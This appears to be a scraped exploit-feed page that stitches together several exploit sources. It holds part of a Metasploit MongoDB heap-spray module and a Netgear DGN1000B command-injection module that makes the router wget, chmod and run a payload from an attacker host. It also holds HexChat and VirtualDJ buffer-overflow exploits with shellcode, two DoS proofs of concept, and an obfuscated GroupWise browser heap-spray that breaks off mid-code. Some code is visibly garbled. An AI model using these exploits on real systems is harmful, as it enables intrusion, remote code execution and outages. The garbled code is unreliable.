fail_with(Exploit::Failure::BadConfig, "USERNAME and PASSWORD must be provided") end if do_login==0 disconnect fail_with(Exploit::Failure::NoAccess, "Authentication failed") end else print_good("Mongo server #{datastore['RHOST']} doesn't use authentication") end if datastore['COLLECTION'] && datastore['COLLECTION'] != "" collection = datastore['COLLECTION'] else collection = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz') if read_only?(collection) disconnect fail_with(Exploit::Failure::BadConfig, "#{datastore['USERNAME']} has read only access, please provide an existent collection") else print_good("New document created in collection #{collection}") end end print_status("Let's exploit, heap spray could take some time...") my_target = target shellcode = Rex::Text.to_unescape(payload.encoded) mmap = my_target['mmap'].pack("V*") ret = [my_target['ret']].pack("V*") gadget1 = "0x#{my_target['gadget1'].to_s(16)}" gadget2 = Rex::Text.to_hex([my_target['gadget2']].pack("V")) gadget3 = Rex::Text.to_hex([my_target['gadget3']].pack("V")) gadget4 = Rex::Text.to_hex([my_target['gadget4']].pack("V")) gadget5 = Rex::Text.to_hex([my_target['gadget5']].pack("V")) shellcode_var="a"+Rex::Text.rand_text_hex(4) sizechunk_var="b"+Rex::Text.rand_text_hex(4) chunk_var="c"+Rex::Text.rand_text_hex(4) i_var="d"+Rex::Text.rand_text_hex(4) array_var="e"+Rex::Text.rand_text_hex(4) ropchain_var="f"+Rex::Text.rand_text_hex(4) chunk2_var="g"+Rex::Text.rand_text_hex(4) array2_var="h"+Rex::Text.rand_text_hex(4) # nopsled + shellcode heapspray payload_js = shellcode_var+'=unescape("'+shellcode+'");' payload_js << sizechunk_var+'=0x1000;' payload_js << chunk_var+'="";' payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk_var+'+=unescape("%u9090%u9090"); } ' payload_js << chunk_var+'='+chunk_var+'.substring(0,('+sizechunk_var+'-'+shellcode_var+'.length));' payload_js << array_var+'=new Array();' payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array_var+'['+i_var+']='+chunk_var+'+'+shellcode_var+'; } ' # retchain + ropchain heapspray payload_js << ropchain_var+'=unescape("'+Rex::Text.to_unescape(mmap)+'");' payload_js << chunk2_var+'="";' payload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk2_var+'+=unescape("'+Rex::Text.to_unescape(ret)+'"); } ' payload_js << chunk2_var+'='+chunk2_var+'.substring(0,('+sizechunk_var+'-'+ropchain_var+'.length));' payload_js << array2_var+'=new Array();' payload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array2_var+'['+i_var+']='+chunk2_var+'+'+ropchain_var+'; } ' # Trigger and first ropchain payload_js << 'nativeHelper.apply({"x" : '+gadget1+'}, ' payload_js << '["A"+"'+gadget3+'"+"'+Rex::Text.rand_text_hex(12)+'"+"'+gadget2+'"+"'+Rex::Text.rand_text_hex(28)+'"+"'+gadget4+'"+"\\x20\\x20\\x20\\x20"+"'+gadget5+'"]);' request_id = Rex::Text.rand_text(4) packet = request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB']+"."+collection+"\x00" #fullCollectionName (db.collection) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\x01\x00\x00\x00" #numberToReturn (1) where = "\x02\x24\x77\x68\x65\x72\x65\x00" where << [payload_js.length+4].pack("L") where << payload_js+"\x00" where.insert(0, where.length +.pack("L")) packet += where packet.insert(0, packet.length +.pack("L")) sock.put(packet) disconnect rescue ::Exception => e fail_with(Exploit::Failure::Unreachable, "Unable to connect") end end def require_auth? request_id = Rex::Text.rand_text(4) packet = "\x3f\x00\x00\x00" #messageLength (63) packet << request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY) packet << "\x00\x00\x00\x00" #flags packet << "\x61\x64\x6d\x69\x6e\x2e\x24\x63\x6d\x64\x00" #fullCollectionName (admin.$cmd) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\x01\x00\x00\x00" #numberToReturn (1) #query ({"listDatabases"=>1}) packet << "\x18\x00\x00\x00\x10\x6c\x69\x73\x74\x44\x61\x74\x61\x62\x61\x73\x65\x73\x00\x01\x00\x00\x00\x00" sock.put(packet) response = sock.get_once have_auth_error?(response) end def read_only?(collection) request_id = Rex::Text.rand_text(4) _id = "\x07_id\x00"+Rex::Text.rand_text(12)+"\x02" key = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+"\x00" value = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+"\x00" insert = _id+key+[value.length].pack("L")+value+"\x00" packet = [insert.length+24+datastore['DB'].length+6].pack("L") #messageLength packet << request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd2\x07\x00\x00" #opCode (2002 Insert Document) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB'] + "." + collection + "\x00" #fullCollectionName (DB.collection) packet << [insert.length+4].pack("L") packet << insert sock.put(packet) request_id = Rex::Text.rand_text(4) packet = [datastore['DB'].length + 61].pack("L") #messageLength (66) packet << request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 Query) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\xff\xff\xff\xff" #numberToReturn (1) packet << "\x1b\x00\x00\x00" packet << "\x01\x67\x65\x74\x6c\x61\x73\x74\x65\x72\x72\x6f\x72\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00" sock.put(packet) response = sock.get_once have_auth_error?(response) end def do_login print_status("Trying #{datastore['USERNAME']}/#{datastore['PASSWORD']} on #{datastore['DB']} database") nonce = get_nonce status = auth(nonce) return status end def auth(nonce) request_id = Rex::Text.rand_text(4) packet = request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\xff\xff\xff\xff" #numberToReturn (1) #{"authenticate"=>1.0, "user"=>"root", "nonce"=>"94e963f5b7c35146", "key"=>"61829b88ee2f8b95ce789214d1d4f175"} document = "\x01\x61\x75\x74\x68\x65\x6e\x74\x69\x63\x61\x74\x65" document << "\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x02\x75\x73\x65\x72\x00" document << [datastore['USERNAME'].length + 1].pack("L") # +1 due null byte termination document << datastore['USERNAME'] + "\x00" document << "\x02\x6e\x6f\x6e\x63\x65\x00\x11\x00\x00\x00" document << nonce + "\x00" document << "\x02\x6b\x65\x79\x00\x21\x00\x00\x00" document << Rex::Text.md5(nonce + datastore['USERNAME'] + Rex::Text.md5(datastore['USERNAME'] + ":mongo:" + datastore['PASSWORD'])) + "\x00" document << "\x00" #Calculate document length document.insert(0, document.length +.pack("L")) packet += document #Calculate messageLength packet.insert(0, [(packet.length + 4)].pack("L")) #messageLength sock.put(packet) response = sock.get_once if have_auth_error?(response) print_error("Bad login or DB") return 0 else print_good("Successful login on DB #{datastore['db']}") return 1 end end def get_nonce request_id = Rex::Text.rand_text(4) packet = [datastore['DB'].length + 57].pack("L") #messageLength (57+DB.length) packet << request_id #requestID packet << "\xff\xff\xff\xff" #responseTo packet << "\xd4\x07\x00\x00" #opCode (2004 OP_QUERY) packet << "\x00\x00\x00\x00" #flags packet << datastore['DB'] + ".$cmd" + "\x00" #fullCollectionName (DB.$cmd) packet << "\x00\x00\x00\x00" #numberToSkip (0) packet << "\x01\x00\x00\x00" #numberToReturn (1) #query {"getnonce"=>1.0} packet << "\x17\x00\x00\x00\x01\x67\x65\x74\x6e\x6f\x6e\x63\x65\x00\x00\x00\x00\x00\x00\x00\xf0\x3f\x00" sock.put(packet) response = sock.get_once documents = response[36..1024] #{"nonce"=>"f785bb0ea5edb3ff", "ok"=>1.0} nonce = documents[15..30] end def have_auth_error?(response) #Response header 36 bytes long documents = response[36..1024] #{"errmsg"=>"auth fails", "ok"=>0.0} #{"errmsg"=>"need to login", "ok"=>0.0} if documents.include?('errmsg') || documents.include?('unauthorized') return true else return false end end

==> Netgear DGN1000B setup.cgi Remote Command Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Netgear DGN1000B setup.cgi Remote Command Execution', 'Description' => %q{ Some Netgear Routers are vulnerable to authenticated OS Command injection. The vulnerability exists in the web interface, specifically in the setup.cgi component, when handling the TimeToLive parameter. Default credentials are always a good starting point, admin/admin or admin/password could be a first try. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '57836' ], [ 'EDB', '24464' ], [ 'OSVDB', '89985' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-005' ] ], 'DisclosureDate' => 'Feb 06 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsbe Payload', { 'Arch' => ARCH_MIPSBE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1, )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]) ], self.class) end def request(cmd,user,pass,uri) begin res = send_request_cgi( { 'uri' => uri, 'method' => 'POST', 'authorization' => basic_auth(user,pass), 'vars_post' => { "UPnP" => "UPnP", "AdverTime" => rand_text_numeric(2), "TimeToLive" => "`#{cmd}`", "save" => "+Anwenden", "todo" => "save", "this_file" => "upnp.htm", "next_file" => "upnp.htm", "h_UPnP" => "enable", "hiddenAdverTime" => rand_text_numeric(2), "hiddenTimeToLive" => rand_text_numeric(1) } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/setup.cgi' user = datastore['USERNAME'] pass = datastore['PASSWORD'] rhost = datastore['RHOST'] rport = datastore['RPORT'] # # testing Login # print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if 200, 301,.include?(res.code) print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") end return end #thx to Juan for his awesome work on the mipsbe elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the Netgear device to download #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) #not working if we send all command together -> lets take three requests cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # # chmod # cmd = "chmod 777 /tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Netgear device to chmod #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # # execute # cmd = "/tmp/#{filename}" print_status("#{rhost}:#{rport} - Asking the Netgear device to execute #{downfile}") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end

==> Novell ZENworks Configuration Management Remote Execution Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss

==> HexChat 2.9.4 Local Exploit Submission

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/python # HexChat 2.9.4 Local Exploit # Bug found by Jules Carter < @iMulitia > # Exploit by Matt "hostess" Andreko < mandreko [at] accuvant.com > # http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html junk1 = "B"*30 shellcode = ( # msfvenom -p windows/messagebox EXITFUNC=process BufferRegister=ESP -e x86/alpha_mixed -f c "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b" "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58" "\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x68\x6b\x6d\x4b\x4b\x69" "\x44\x34\x64\x64\x59\x64\x74\x71\x78\x52\x6c\x72\x33\x47\x34" "\x71\x78\x49\x42\x44\x4e\x6b\x50\x71\x50\x30\x4e\x6b\x64\x36" "\x54\x4c\x4c\x4b\x44\x36\x77\x6c\x4c\x4b\x33\x76\x77\x78\x4c" "\x4b\x73\x4e\x51\x30\x4e\x6b\x75\x66\x56\x58\x72\x6f\x72\x38" "\x51\x65\x68\x73\x43\x69\x37\x71\x38\x51\x39\x6f\x58\x61\x73" "\x50\x4e\x6b\x30\x6c\x36\x44\x77\x54\x6c\x4b\x42\x65\x75\x6c" "\x6e\x6b\x73\x64\x36\x48\x31\x68\x46\x61\x6a\x4a\x4e\x6b\x52" "\x6a\x66\x78\x6e\x6b\x73\x6a\x57\x50\x43\x31\x7a\x4b\x6d\x33" "\x34\x74\x42\x69\x6c\x4b\x47\x44\x4c\x4b\x67\x71\x48\x6e\x74" "\x71\x6b\x4f\x36\x51\x79\x50\x6b\x4c\x4e\x4c\x4c\x44\x39\x50" "\x34\x34\x75\x57\x49\x51\x4a\x6f\x36\x6d\x67\x71\x4a\x67\x5a" "\x4b\x5a\x54\x67\x4b\x71\x6c\x61\x34\x34\x68\x32\x55\x6d\x31" "\x6e\x6b\x33\x6a\x47\x54\x76\x61\x38\x6b\x71\x76\x4c\x4b\x64" "\x4c\x52\x6b\x4e\x6b\x71\x4a\x67\x6c\x67\x71\x4a\x4b\x4e\x6b" "\x74\x44\x4c\x4b\x76\x61\x69\x78\x4e\x69\x62\x64\x66\x44\x47" "\x6c\x63\x51\x5a\x63\x6e\x52\x33\x38\x61\x39\x69\x44\x6b\x39" "\x59\x75\x6c\x49\x58\x42\x73\x58\x4e\x6e\x72\x6e\x56\x6e\x58" "\x6c\x62\x72\x4d\x38\x4f\x6f\x6b\x4f\x69\x6f\x69\x6f\x4f\x79" "\x61\x55\x75\x54\x6d\x6b\x31\x6e\x4e\x38\x79\x72\x70\x73\x6f" "\x77\x45\x4c\x45\x74\x70\x52\x39\x78\x6c\x4e\x4b\x4f\x49\x6f" "\x59\x6f\x6f\x79\x43\x75\x55\x58\x73\x58\x62\x4c\x70\x6c\x51" "\x30\x77\x31\x53\x58\x67\x43\x54\x72\x66\x4e\x61\x74\x71\x78" "\x52\x55\x44\x33\x62\x45\x61\x62\x6d\x58\x51\x4c\x75\x74\x57" "\x7a\x4c\x49\x58\x66\x73\x66\x6b\x4f\x30\x55\x47\x74\x6b\x39" "\x4f\x32\x72\x70\x4d\x6b\x39\x38\x6d\x72\x72\x6d\x4f\x4c\x4b" "\x37\x35\x4c\x67\x54\x30\x52\x5a\x48\x75\x31\x39\x6f\x6b\x4f" "\x39\x6f\x33\x58\x42\x4f\x34\x38\x53\x68\x31\x30\x72\x48\x35" "\x31\x73\x57\x61\x75\x62\x62\x35\x38\x72\x6d\x72\x45\x54\x33" "\x62\x53\x54\x71\x69\x4b\x6f\x78\x33\x6c\x75\x74\x54\x4a\x6f" "\x79\x78\x63\x61\x78\x72\x78\x45\x70\x77\x50\x75\x70\x70\x68" "\x72\x6d\x50\x53\x37\x36\x77\x51\x70\x68\x43\x42\x30\x6f\x42" "\x4d\x71\x30\x35\x38\x52\x4f\x66\x4c\x31\x30\x61\x76\x61\x78" "\x71\x58\x50\x65\x42\x4c\x32\x4c\x55\x61\x5a\x69\x6e\x68\x72" "\x6c\x61\x34\x44\x50\x4f\x79\x4d\x31\x56\x51\x4b\x62\x33\x62" "\x61\x43\x46\x31\x52\x72\x39\x6f\x58\x50\x46\x51\x49\x50\x42" "\x70\x69\x6f\x36\x35\x34\x48\x41\x41" ) junk2 = "A"*(13306-len(shellcode)) stage1 = "\x4c\x4c\x77\x21" # 21 byte jump (JA) ret = "\x63\x64\x62\x68" # ASCII PPR junk3 = "C"*29 stage2 = "\x61"*38 # POPAD x 38 stage2 += "\x54" # PUSH ESP stage2 += "\xE9" # RETN # This byte is a bad char, but gets converted to RETN and \x88 junk4 = "D"*11586 print "Copy this text, and enter into HexChat's textbox: \"/server [string]\"" print junk1 + shellcode + junk2 + stage1 + ret + junk3 + stage2 + junk4

==> Easy DVD Player (libav) libavcodec_plugin.dll DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/python # Exploit Title:Easy DVD Player (libav) libavcodec_plugin.dll DOS # Download link :http://www.easy-dvd-player.com/download.htm # Author: metacom # version: version V3.5.1 # Category: poc # Tested on: windows 7 German ''' read violation on 0x00000010 libavcodec_plugin.dll (714.520): Access violation - code c0000005 (!!! second chance !!!) *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\ZJMedia\Easy DVD Player\plugins\libavcodec_plugin.dll - eax=ffffffff ebx=01c7b068 ecx=757a98da edx=00000000 esi=0432f93c edi=ffffffff eip=61acc6d0 esp=0432f900 ebp=62134ce0 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 libavcodec_plugin!vlc_entry__1_1_0g+0x1b350: 61acc6d0 8b4210 mov eax,dword ptr [edx+10h] ds:0023:00000010=???????? ''' filename= "Easy.nsv" buffer = "\xCC" * 5000 textfile = open(filename , 'w') textfile.write(buffer)

==> Personal File Share 1.0 DoS Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #!/usr/bin/python #Exploit Title: Personal File Share 1.0 DoS #Date: 2nd April 2013 #Exploit Author: npn #Vendor Homepage: http://www.srplab.com/ #Software Link: http://download.cnet.com/Personal-File-Share/3000-18506_4-75893424.html #Version: 1.0 #Tested on: Windows XP SP3 English import socket, sys sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(("192.168.32.129", 8080)) buffer = "GET /" buffer += "A"*5000 buffer += " HTTP/1.1\r\n\r\n" sock.send(buffer) sock.close()

==> VirtualDJ Pro/Home <=7.3 Buffer Overflow Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss #Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability #By: Alexandro Sánchez Bach | functionmixer.blogspot.com #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0 import string def unicodeHex(c): c = hex(ord(c))[2:].upper() if len(c)==1: c = "0"+c return c+"00" def movEAX(s): #Arrays s = map(ord, list(s)) inst = [] target = 512, 512, 512, carry = [0,-2,-2,-2] for i in range(4): if s[i] < 0x10: target[i] = 256 if i < 3: carry[i+1] = -1 diff = [target[b] - s[b] for b in range(4)] #Gen instructions for i in range(3): target = [target[b] - diff[b]/4 for b in range(4)] inst += [[diff[b]/4 for b in range(4)]] target = [target[b] - s[b] + carry[b] for b in range(4)] inst += [target] #Remove character '\' for b in range(4): if ord("[") in [inst[i][b] for i in range(4)] or \ ord("\\") in [inst[i][b] for i in range(4)] or \ ord("]") in [inst[i][b] for i in range(4)]: for i in range(4): inst[i][b] = inst[i][b]+5*((-1)**(i)) inst = "\x2D"+"".join(map(chr, i)) for i in return "".join(inst) #Shellcode: Run cmd.exe shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45" shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3" retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2 shellcode += retAddress while len(shellcode) % 4 != 0: shellcode += '\x90' exploit = "" for i in range(0,len(shellcode),4)[::-1]: exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F" #EAX = 0 exploit += movEAX(shellcode[i:i+4]) #EAX = shellcode[i:i+4] exploit += "\x50" #PUSH EAX exploit += '\x54' #PUSH ESP exploit += '\xC3' #RET c = 0 for i in exploit: if i in string.ascii_letters: c+=1 exploit += "A"*(4100-c) exploit += "FSFD" print exploit #Paste the generated code in the tag 'Title' of the MP3 file.

==> Novell GroupWise 12.0 SecManageRecipientCertificates method Exploit

http://rss.feedsportal.com/c/32479/f/477548/index.rss <!-- (c)oded by High-Tech Bridge Security Research Lab --> <!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled --> <html> <Title>- Novell GroupWise 12.0 SecManageRecipientCertificates method Exploit -</Title> <object id=ctrl classid='clsid:{BFEC5A01-1EB1-11D1-BC96-00805FC1C85A}'></object> <script language='javascript'> function GyGguPonxZoADbtgXPS() { } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) { this.maxAlloc = (maxAlloc ? maxAlloc : 65535); this.heapBase = (heapBase ? heapBase : 0x150000); this.KJZFzfumaV = "AAAA"; while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) { this.KJZFzfumaV += this.KJZFzfumaV; } this.mem = new Array(); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) { void(Math.atan2(0xbabe, msg)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) { if (enable == true) void(Math.atan(0xbabe)); else void(Math.asin(0xbabe)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) { void(Math.acos(0xbabe)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) { if (len > this.KJZFzfumaV.length) throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available"; return this.KJZFzfumaV.substr(0, len); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) { if (UWzqrDQwReXOllGssMYEzruQtomLp == 0) throw "Round argument cannot be 0"; return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width) { var digits = "0123456789ABCDEF"; var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1); while (num > 0xF) { num = num >>> 4; beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg; } var width = (width ? width : 0); while (beTBwoiJGBBhwyZg.length < width) beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg; return beTBwoiJGBBhwyZg; } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) { return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4)); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw "Allocation size " + size + " must be a multiple of 16"; if (this.mem[tag] === undefined) this.mem[tag] = new Array(); if (typeof arg == "string" || arg instanceof String) { this.mem[tag].push(arg.substr(0, arg.length)); } else { this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2)); } } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) { delete this.mem[tag]; CollectGarbage(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() { this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache"); this.SWc("oleaut32"); for (var i = 0; i < 6; i++) { this.nPdkLCpaz(32, "oleaut32"); this.nPdkLCpaz(64, "oleaut32"); this.nPdkLCpaz(256, "oleaut32"); this.nPdkLCpaz(32768, "oleaut32"); } } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if (size == 32 || size == 64 || size == 256 || size == 32768) throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache"; this.nPdkLCpaz(arg, tag); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) { this.SWc(tag); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() { this.mNhbOXqosTNKjGhfj("Running the garbage collector"); CollectGarbage(); this.AocZkxOTvEXwFTsIPMSanrManzYrte(); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) { var count = (count ? count : 1); for (var i = 0; i < count; i++) { this.uYiBaSLpjlOJJdhFAb(arg); this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR"); } this.uYiBaSLpjlOJJdhFAb(arg); this.K("ZsJjplNR"); } GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) { var size; if (typeof arg == "string" || arg instanceof String) size = 4 + arg.length*2 + 2; else size = arg; if ((size & 0xf) != 0) throw 